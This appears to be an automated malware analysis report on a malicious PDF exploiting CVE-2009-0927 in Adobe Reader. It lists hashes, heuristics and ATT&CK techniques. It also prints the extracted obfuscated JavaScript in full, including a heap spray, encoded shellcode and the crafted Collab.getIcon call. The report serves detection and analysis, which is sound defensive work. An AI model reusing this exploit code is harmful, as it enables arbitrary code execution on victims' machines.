Malicious PDF — malware analysis report

Static analysis result for SHA-256 0a0f9be1f0a91d25…

MALICIOUS

PDF

86.5 KB Created: 2009-09-17 09:09:59 +08:00 Authoring application: Acrobat Distiller 7.0 (Windows) First seen: 2026-05-10
MD5: 10591263b1fcd7537b4b3e46802bd329 SHA-1: 6c92f6b6f5ff14642cc7aea7e52a659f67175aea SHA-256: 0a0f9be1f0a91d25b35813d425fac8264a2ada01c1d3fbfe91ea41bfa0e9563f
110 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF sample contains embedded JavaScript that leverages the Collab.getIcon method, indicating exploitation of CVE-2009-0927. The JavaScript is obfuscated and uses unescape, suggesting it's designed to download and execute a secondary payload. The ML classifier also strongly flagged this PDF as malicious.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 5

  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdfx/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0017_000.js pdf-javascript-stream PDF /JS object 17 at offset 0x4DA 2823 bytes
SHA-256: 80b866f827da1c58c9486f9e74f3ddf67d4b0cdb1efa42473d1985daa759d091
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var unes=unescape
function rep(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
var sc
function myunes(buf) {
          var ret='';
          for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
                  ret += util["\x62\x79\x74\x65\x54\x6f\x43\x68\x61\x72"](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
          }
          return ret;
}

for(i=0;i<18000;i++)
sc = sc+0x70;
sc=unes("%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9"+
"\x25\x75EBFA\x25\x75E805\x25\x75FFEB\x25\x75FFFF\x25\x75F911\x25\x75F9F9\x25\x75A3F9\x25\x7572AC\x25\x757815\x25\x759D15\x25\x75F9FD\x25\x7572F9"+
"%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF"+
"%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06"+
"%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF"+
"%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791"+
"%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA"+
"%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601"+
"%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993"+
"%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD"+
"%uF901%u328D%uF993%uF993%uF993%uFD93%u8F06%u06BD"+
"%uEDAF%uBF70%u7AB1%uF901%u4C8D%uC178%uA9DC%uBFBD"+
"%uB772%u8CC5%u7854%uF941%uF9EB%uA9F9%uA99D%u8CBD"+
"%u7858%uFD41%uF9EB%u16F9%u1307%u8C57%u406C%uFFF9"+
"%uF9F9%u1578%uF1F9%uF9F9%uAEAF%u0972%u3F78%uEBE9"+
"%uF9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9"+
"%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608"+
"%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D"+
"%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589"+
"%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD"+
"%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9"+
"%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD"+
"%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5"+
"%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D"+
"%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72"+
"%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372"+
"%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C"+
"%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");
function exp() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
wap = 20+blah["\x6c\x65\x6e\x67\x74\x68"]
while (bbk["\x6c\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["\x6c\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<0x40000) bk = bk+bk+fillbk;
mm = new Array();
for (i=0;i<200;i++) mm[i] = bk + blah;
of = rep(4096, myunes("0a0a0a0a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
Collab["\x67\x65t\x49\x63\x6f\x6e"](of+a[0x0]);
}

var inBrowser = this.external;
if (inBrowser)
          var shaft = app.setTimeOut("exp()",1200);
else
          exp();

Open this report in the interactive analyzer, or submit your own file for analysis.